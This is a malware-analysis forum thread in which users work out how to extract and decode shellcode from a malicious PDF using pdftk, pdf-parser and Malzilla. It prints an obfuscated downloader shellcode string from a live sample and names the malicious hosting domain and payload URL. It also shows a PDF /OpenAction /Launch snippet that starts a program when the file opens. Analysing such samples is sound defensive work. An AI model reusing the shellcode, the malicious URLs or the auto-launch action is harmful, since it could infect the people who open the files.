Methods to extract shellcode from malicious PDF

[valkyriex]

Hi all,

Anyone has tried to extract shellcode from PDF? I appreciate if you could list out some better steps.

For me, I will do this as below:
1. Run with pdfId to check there is any Javascript and other object
2. Read it in text editor.
3. Uncompress it with pdf-parser, if needed.
4. However, when I did step 3 and open the file again, the code is uncompressed but there are lots of brackets which cause confusion within the stream content. It seems that I have made a wrong attempt on the compression.

In fact, I have found an analysis from Norway Honeynet Project Team:
http://www.honeynor.no/category/analysis/

Thank you to your advice, dudes.

Regards,
0xdf

[SysAdMini]

Please give us a specific example/sample.

[valkyriex]

Hi Holger,

I simply got the sample from here:
salarisgreetteplo.in/pdf.php

Of course, it is easy to throw this sample to Anubis for analysis, however, I would like to make kinds of analysis like the automatic sandbox does.

Regards,
Anthony

[valkyriex]

I may make a mistake it is not compressed but obfuscated.

[SysAdMini]

I can only tell you how I do it manually.

-pdftk pdf.php output pdf.txt uncompress
-copy decoded javascript section from pdf.txt into Malzilla's decoder tab
-replace line "mmsm = app["s"+vttv+"e"+vttv+"t"+vttv+"T"+vttv+"i"+vttv+"m"+vttv+"e"+vttv+"O"+vttv+"u"+vttv+"t"]("ev"+vttv+"al(tts"+vttv+"dff[jio"+vttv+"ol])", 980);"
 by "document.write(ttsdff[jiool]); "
-"run script"
-copy encoded shellcode into Malzilla's "Misc decoders" tab

Code: [Select]

jhnmzC033jhnmz8B64jhnmz3040jhnmz0C78jhnmz408Bjhnmz8B0Cjhnmz1C70jhnmz8BADjhnmz0858jhnmz09EBjhnmz408Bjhnmz8D34jhnmz7C40jhnmz588Bjhnmz6A3Cjhnmz5A44jhnmzE2D1jhnmzE22BjhnmzEC8Bjhnmz4FEBjhnmz525AjhnmzEA83jhnmz8956jhnmz0455jhnmz5756jhnmz738Bjhnmz8B3Cjhnmz3374jhnmz0378jhnmz56F3jhnmz768Bjhnmz0320jhnmz33F3jhnmz49C9jhnmz4150jhnmz33ADjhnmz36FFjhnmzBE0Fjhnmz0314jhnmzF238jhnmz0874jhnmzCFC1jhnmz030Djhnmz40FAjhnmzEFEBjhnmz3B58jhnmz75F8jhnmz5EE5jhnmz468Bjhnmz0324jhnmz66C3jhnmz0C8Bjhnmz8B48jhnmz1C56jhnmzD303jhnmz048Bjhnmz038Ajhnmz5FC3jhnmz505Ejhnmz8DC3jhnmz087Djhnmz5257jhnmz33B8jhnmz8ACAjhnmzE85BjhnmzFFA2jhnmzFFFFjhnmzC032jhnmzF78BjhnmzAEF2jhnmzB84Fjhnmz2E65jhnmz7865jhnmz66ABjhnmz6698jhnmz33ABjhnmzB8C0jhnmz6461jhnmz0000jhnmz6850jhnmz6854jhnmz6572jhnmz2435jhnmz691Cjhnmz5074jhnmz5354jhnmzAAB8jhnmz0DFCjhnmzFF7Cjhnmz0455jhnmzF88BjhnmzC483jhnmzB00Cjhnmz8A6Cjhnmz98E0jhnmz6850jhnmz6E6Fjhnmz642Ejhnmz7568jhnmz6C72jhnmz546Djhnmz8EB8jhnmz0E4EjhnmzFFECjhnmz0455jhnmz5093jhnmzC033jhnmz5050jhnmz8B56jhnmz0455jhnmzC283jhnmz837Fjhnmz4CC2jhnmz5052jhnmz36B8jhnmz2F1AjhnmzFF70jhnmz0455jhnmz575BjhnmzB856jhnmzFE98jhnmz0E8Ajhnmz55FFjhnmz6A04jhnmzFF00jhnmz68D7jhnmz7474jhnmz3A70jhnmz2F2Fjhnmz6173jhnmz616Cjhnmz6972jhnmz6773jhnmz6572jhnmz7465jhnmz6574jhnmz6C70jhnmz2E6Fjhnmz6E69jhnmz662Fjhnmz6565jhnmz6264jhnmz6361jhnmz2E6Bjhnmz6870jhnmz3F70jhnmz6170jhnmz6567jhnmz333D-replace "jhnmz" by "%u"
-press "USC2 To Hex", copy result into clipboard
-goto "Shellcode analyzer" tab, right click, "paste as hex"
-now you see the shellcode url hxxp://salarisgreetteplo.in/feedback.php?page=3

[valkyriex]

Thank you so much. It gives a 2nd stage of ShellCode download?

[SysAdMini]

Thank you so much. It gives a 2nd stage of ShellCode download?

No there is no 2nd stage. This url is the payload -a trojan. Shellcode downloads and executes this file.

[valkyriex]

Yup, you are right. It downloads an executable which runs under svchost as I just got the executable and upload to Anubis for analysis. Thank you, Holger.

[origami]

What kind of features would you appreciate in a PDF framework to extract specific stuff, or look for simple/obvious shellcode for instance?

I mean we support lots of PDF objects, and adding scripts with a bit of intelligence is not very difficult once the file is properly read. So ask, and we'll add these features as soon as we have time (or you could also add you own scripts ;-)

[valkyriex]

Hi SysAdMini ,

Let me try it out in pdf-parser for uncompression to view there is any difference tonight. I used pdf-parser is for uncompression on FLATE encoding, is there any significant difference between these two tools? I have found that some fellows in forum found that it may work only for either tool.

Hi Origami,

It seems that decoding on particular object stream is the core part. For example, the analysis from Websense (http://securitylabs.websense.com/content/Blogs/3311.aspx), it is not simple encoding and decoding method could do and rather we need to attach the running adobe process so as to gain the decrypted code.

Extracting and enaginge simple decoding shellcode would be a nice feature. 

Regards,
Anthony

[parody]

That websense blog goes in a direction not always required. They do a live analysis of how the exploit reacts within Adobe reader. Normally the shellcode should be able to be interpreted from a dead listing into IDA or transfered into a shellcode loader stub like http://sandsprite.com/shellcode_2_exe.php which will spit out a .exe file to load into Ollydbg or Immunitydbg for review.

With experience you will start to recognize types of shellcode and their purpose. :]

[valkyriex]

Hi all,

I have tried a while that I would like to manually add lines to the .pdf file so that I could pop up a calc.exe while other opens the pdf file and give an alert javascript box.

I appreciate if you could give me hints on PDF programming and I simply extract these two pieces of scriptlets and simply embed them into one of the object (i.e. 6 0 object). When I open the file, it flashes with a box and I believe I failed on it.

Merry Christmas to you all and thank you for your advices.

/OpenAction <<
   /S /Launch /F <<
      /DOS (C:\WINDOWS\system32\calc.exe)
      /Unix (/usr/bin/xcalc)
      /Mac (/Applications/Calculator.app)
      >>
>>

/OpenAction <<
                /S /JavaScript
                /JS (app.alert\("Method: /OpenAction"\))
        >>
        /Pages 2 0 R
        /Type /Catalog
>>

Regards,
Anthony

---------------------------

[valkyriex]

It seems it cuts much efforts if I refer to Origami library and ruby scripts.

Merry Christmas to you all and have fun with Malware analysis, dudes.

Regards,
Anthony